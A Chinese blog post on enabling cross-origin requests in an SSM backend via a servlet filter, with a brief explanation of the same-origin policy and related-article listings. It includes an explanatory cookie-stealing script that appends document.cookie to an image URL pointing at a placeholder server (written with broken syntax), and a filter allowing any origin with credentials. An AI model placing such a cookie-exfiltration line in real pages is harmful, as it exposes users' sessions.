ssm跨域解决

最新推荐文章于 2025-05-18 11:48:30 发布
原创 最新推荐文章于 2025-05-18 11:48:30 发布 · 900 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

最近挑战杯项目要交了,最后一个开发的项目,还是得好好对待,不知道会不会真香,昨天还是遇到了一些问题,尤其是对接的时候,用postman对接的时候,没有啥问题,结果前端上线对接时,发现ajax无法请求到后台,才想起了我没处理跨域,顺便查阅了同源策略,复习了下劫持cookie,下面是浅谈ssm后台跨域解决及同源政策
一.ssm后台跨域

1.创建过滤器类

public class SimpleCORSFilter implements Filter {
    private boolean isCross = false;

    public void destroy() {
        isCross = false;
    }


    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        if (isCross) {
            HttpServletRequest httpServletRequest = (HttpServletRequest) request;
            HttpServletResponse httpServletResponse = (HttpServletResponse) response;
            System.out.println("拦截请求: " + httpServletRequest.getServletPath());
            httpServletResponse.setHeader("Access-Control-Allow-Origin", "*");
            httpServletResponse.setHeader("Access-Control-Allow-Methods", "POST, GET, OPTIONS, DELETE");
            httpServletResponse.setHeader("Access-Control-Max-Age", "0");
            httpServletResponse.setHeader("Access-Control-Allow-Headers",
                    "Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,userId,token");
            httpServletResponse.setHeader("Access-Control-Allow-Credentials", "true");
            httpServletResponse.setHeader("XDomainRequestAllowed", "1");
        }
        chain.doFilter(request, response);
    }

    public void init(FilterConfig filterConfig) throws ServletException {
        String isCrossStr = filterConfig.getInitParameter("IsCross");
        isCross = isCrossStr.equals("true") ? true : false;
        System.out.println(isCrossStr);
    }


}

2.打开web.xml,创建过滤器


<filter>
    <filter-name>SimpleCORSFilter</filter-name>
    <filter-class>com.homyit.filter.SimpleCORSFilter</filter-class>
    <init-param>
      <param-name>IsCross</param-name>
      <param-value>true</param-value>
    </init-param>
  </filter>
  <filter-mapping>
  <filter-name>SimpleCORSFilter</filter-name>
  <url-pattern>/*</url-pattern>
  </filter-mapping>

二.同源策略

同源策略是一种约定,是浏览器保护用户安全的核心手段.按我的个人理解就是限制了其他源之间的交互
1.源及什么定义为同源
源:指的是协议:域名:端口号这三个元素组成的,也就是url前面的。
同源:指的是源的三个元素相同

2.同源策略种类

同源策略分为两种:
1.DOM同源策略
比如标签引用其他页面的时候,不可以在获得其他源的dom节点,禁止对其他源的dom进行操作
2.XHR同源策略
禁止向不同源的发出http请求
额外提下标签可以不受同源政策的限制,也就是容易引发cookie劫持.例如

<script>
var img = Document.createElement("img");
img.src="你服务器的ip"+document.cookie();
Document.getElement("html").appendChild(img);
</script>
ssm项目开发过程中问题解决
galaxyxupt的博客
06-01 2193
在写这学期课设时,页面没有采用jsp,前端是对床在他本子上写的,我提供了url给他,他的ajax请求后后台却返回了403,但是这时候我写的jsp测试却没有问题,开始怀疑是表单提交和ajax提交的请求类别不同,于是在网上搜,果然找到了一些线索: 当请求方法不是GET\POST\HEAD之一或者请求类型不是application/x-www-form-urlencoded、multipart/for...
Vue+SSM问题解决
qq_50915025的博客
07-05 570
刚学完ssm框架,想着自己搭建环境与vue前端进行数据交互,遇到了问题,然后百度了很多方法,试过导坐标,配置过滤器,配置拦截器,配置xml文件,目前适合我的就是配置spring-mvc.xml文件,只用配置这个文件就能解决问题啦。有什么不对的地方大佬可以指出来,我小白一枚。在spring-mvc.xml中配置用qs来封装数据,后台能直接接收到...
ssm问题解决方案
11-18
ssm问题解决方案
ssm框架配置架包及配置文件
11-19
实现Java中ssm框架开发中过程中,通过html、app等直接调用接口。完美解决问题
SSM解决
qq_67021195的博客
07-18 745
SSM解决
ssm解决问题
坤的博客
05-31 3607
1.什么是 ,即站HTTP请求(Cross-site HTTP request),指发起请求的资源所在不同于请求指向资源所在的HTTP请求。 2.的应用情景 当使用前后端分离,后端主导的开发方式进行前后端协作开发时,常常有如下情景: 后端开发完毕在服务器上进行部署并给前端API文档。 前端在本地进行开发并向远程服务器上部署的后端发送请求。 在这种开发过程中,如果前端想要一边开发一边测试接口,就需要使用的方式 3.解决方法 1.XML全局配置 所有请求都可以访问 <mvc:c
ssmjar包和配置
12-14
本教程将详细介绍如何在SSM框架中解决问题,主要涉及导入特定的jar包和在`web.xml`中进行配置。 首先,让我们理解什么是是指由于同源策略,浏览器限制了一个源(协议+名+端口)下的文档或脚本请求...
ssm整合篇-配置访问-前后端分离配置
听雨少年的博客
06-22 2002
ssm整合篇----访问 做完了ssm的整合以后,很多时候在做项目的时候,会发现出现访问的问题,这个主要是出现在前后端分离的项目中。 那么我们该如何解决访问呢? 为什么会出现问题 出于浏览器的同源策略限制。同源策略(Sameoriginpolicy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。同源策略会阻止一个的javascript脚本和另外一个的内容进行
java中SSM框架解决问题
qq_41373328的博客
11-18 492
新建一个过滤器,并实现 Filter 接口 public class SimpleCORSFilter implements Filter { private boolean isCross = false; @Override public void destroy() { isCross = false; } @Override ...
ssm项目访问
weixin_33968104的博客
02-28 281
最近使用ssm开发了一个项目,为了项目的开发速度,采用的是前后端同时开发,所以前端文件没有集成在项目中,最后在调试时涉及到了解决方法很多,我采用的是最简单的一种,代码如下: 新建一个过滤器filter package com.xxxx.xxxxx; import javax.servlet.*; import javax.servlet.http.HttpS...
SSM解决问题
Ms_future的博客
06-23 415
SSM解决问题
SSM项目中的问题
qq_42640067的博客
03-12 2772
关于1、的概念2、解决2.1、前端2.2、代理 1、的概念 首先要理解什么是指的是浏览器不能执行其他网站的脚本。它是由浏览器的同源策略造成的,是浏览器施加的安全限制。 同源策略 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。同源策略是由Netscape提出的一个著名的安全策略。 一般的uri格式
SpringBoot/SSM体系下解决方案
小小默:进无止境
10-24 1669
本文总结SpringBoot或者SSM体系下后端处理方案。
java SSM 解决问题
w36680130的博客
12-08 129
java SSM 解决问题
SSM框架解决方案与实战配置
最新发布
weixin_31139479的博客
05-18 1144
CORS,全称为源资源共享(Cross-Origin Resource Sharing),是一种安全机制,允许一个的资源被另一个的脚本进行访问。这种机制通过添加HTTP头部来控制哪些可以访问资源,哪些不可以。在Web应用中,浏览器同源策略阻止了不同源之间的资源交互,而CORS正是为了解决这个问题而存在的。从必要性上讲,CORS的实现是现代Web应用发展的必需品。随着API的微服务化和前后端分离架构的普及,前后端通常会有不同的源地址。
Vue+ssm问题解决的两个办法
~朴:shu的博客
12-16 3756
最近在做vue+ssm的项目,遇到问题,下面说说我的理解: 基本项目的搭建: ssm: vue: 基本的项目搭建就不多说了,重点是问题的解决,主要有两个方法。 方法一、注解式: 这种方法仅限于spring 4.x以上(这个x具体是多少我也不知道,包括我用的4.3.6都不行!!不行。所以大家试试这个方法,不行的就换filter解决,不要纠结注解怎么没有作用啊,filter拦截也是很简单的。下面是我用的4.3.6) 好了,开始吧: 在某方法上增加@CrossOrigin.
ssm项目解决AJAX,彻底解决SSM项目前后端分离带来的问题
weixin_31098573的博客
08-05 726
说明总结了一下SSM解决的几种方式。如果项目是用SpringBoot构建的,则有更加优雅的解决方式:https://www.cnblogs.com/phdeblog/p/13260784.html当一个资源从与该资源本身所在的服务器不同的、协议或端口请求一个资源时,资源会发起一个 HTTP 请求。对应到当前场景就是,项目前后端分离,不管是开发阶段,还是最后部署,前后端代码都不在一个服务...
Java中SSM框架解决请求
UserGuan的博客
09-01 7903
方法一:@CrossOrigin注解的方法,只能作用在一个Controller层 直接在Controller类或方法前加上@CrossOrigin注解即可允许所有ip访问 加在Controller类上表示该Controller的所有方法都支持 加在Controller中的方法上表示仅该方法支持 @CrossOrigin // 允许所有ip @CrossOrigin(ori...
SSM配置
03-28
### SSM Framework 中的 (CORS) 配置 在SSM(Spring MVC, Spring, MyBatis)框架中,资源共享(Cross-Origin Resource Sharing, CORS)是一个常见的需求。以下是几种方法可以用来配置支持。 #### 方法一:通过过滤器实现 可以在 `web.xml` 文件中定义一个自定义过滤器来处理请求。这种方式适用于需要为整个应用程序提供统一的策略的情况。 ```xml <filter> <filter-name>CorsFilter</filter-name> <filter-class>org.springframework.web.filter.DelegatingFilterProxy</filter-class> </filter> <filter-mapping> <filter-name>CorsFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> ``` 接着,在 Java 类中创建具体的过滤逻辑: ```java import javax.servlet.*; import java.io.IOException; public class CorsFilter implements Filter { @Override public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) throws IOException, ServletException { HttpServletResponse response = (HttpServletResponse) res; response.setHeader("Access-Control-Allow-Origin", "*"); response.setHeader("Access-Control-Allow-Methods", "POST, GET, OPTIONS, DELETE, PUT"); response.setHeader("Access-Control-Max-Age", "3600"); response.setHeader("Access-Control-Allow-Headers", "Content-Type, Authorization, X-Requested-With"); chain.doFilter(req, res); } @Override public void init(FilterConfig filterConfig) {} @Override public void destroy() {} } ``` 此方式允许灵活控制哪些头文件被接受以及具体的方法[^3]。 #### 方法二:使用注解的方式开启全局支持 如果希望更简单地启用功能,则可以直接利用 Spring 提供的支持。只需在一个配置类上加上 `@CrossOrigin` 或者是在控制器级别添加该注解即可完成基本的功能设定。 对于全局生效情况可如下操作: ```java @Configuration public class WebConfig implements WebMvcConfigurer { @Override public void addCorsMappings(CorsRegistry registry) { registry.addMapping("/**") .allowedOrigins("*") .allowedMethods("GET", "POST", "PUT", "DELETE", "OPTIONS") .maxAge(3600L); } } ``` 上述代码片段展示了如何通过编程手段指定允许访问资源的所有源地址,并开放多种HTTP动词权限[^1]。 #### 方法三:局部范围内的细粒度控制 当只需要针对某些接口做特殊处理时,可以选择单独标注这些API端点上的 `@CrossOrigin` 注解形式来进行个性化定制化管理。 例如下面的例子只对该controller下的所有method有效果: ```java @RestController @RequestMapping("/api/v1/users") @CrossOrigin(origins="http://localhost:8080", methods={RequestMethod.GET}) public class UserController{ // API logic here... } ``` 以上三种途径都可以有效地解决不同场景下遇到的各种类型的难题。开发者可以根据实际业务需求选取最适合自己的方案实施部署。 ```python print("This is an example of Python code block.") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值